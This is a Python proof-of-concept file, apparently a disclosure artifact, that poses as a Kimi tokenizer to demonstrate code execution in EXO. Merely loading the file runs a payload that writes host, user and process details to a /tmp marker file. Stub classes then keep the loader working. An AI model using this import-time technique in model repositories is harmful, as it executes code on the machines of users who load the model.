| |
| |
| |
| |
|
|
| import os |
| import sys |
| from pathlib import Path |
|
|
| |
| |
| |
| POC_MARKER_FILE = "/tmp/exo_poc_marker.txt" |
|
|
| def execute_payload(): |
| """ |
| Proof-of-execution: writes a marker file with basic context info. |
| Non-destructive — only creates one small file under /tmp. |
| """ |
| try: |
| content = ( |
| "=== EXO RCE PoC - Code Execution Confirmed ===\n" |
| f"Hostname: {os.uname().nodename}\n" |
| f"User: {os.getenv('USER', 'unknown')}\n" |
| f"PID: {os.getpid()}\n" |
| f"Python: {sys.executable}\n" |
| f"CWD: {os.getcwd()}\n" |
| ) |
| Path(POC_MARKER_FILE).write_text(content) |
| print(f"[PoC] tokenization_kimi executed — marker written to {POC_MARKER_FILE}") |
| except Exception as exc: |
| print(f"[PoC] Could not write marker file: {exc}") |
|
|
| execute_payload() |
|
|
| |
| |
| |
| |
| |
| |
| |
|
|
| class _InnerModel: |
| """Minimal inner model that satisfies EXO's patched encode path.""" |
| def encode(self, text: str, allowed_special=None) -> list: |
| return [ord(c) % 128 for c in (text or "")] |
|
|
| def decode(self, tokens, errors="replace") -> str: |
| return "".join(chr(t % 128) for t in tokens) |
|
|
|
|
| class TikTokenTokenizer: |
| """ |
| Stub TikTokenTokenizer to satisfy EXO's tokenizer loading expectations. |
| The PoC payload has already executed by the time this class is instantiated. |
| """ |
|
|
| def __init__(self, *args, **kwargs): |
| self.model = _InnerModel() |
| self.eos_token_id = 151643 |
| self.bos_token_id = 151644 |
| self.pad_token_id = 151643 |
| self.eos_token = "<|im_end|>" |
| self.bos_token = "<|im_start|>" |
| print("[PoC] TikTokenTokenizer stub initialised") |
|
|
| @classmethod |
| def from_pretrained(cls, model_path, **kwargs): |
| print(f"[PoC] TikTokenTokenizer.from_pretrained called with: {model_path}") |
| return cls() |
|
|
| def encode(self, text: str, **kwargs) -> list: |
| return self.model.encode(text) |
|
|
| def decode(self, tokens, **kwargs) -> str: |
| return self.model.decode(tokens) |
|
|
|
|
| print("[PoC] tokenization_kimi.py loaded successfully") |
|
|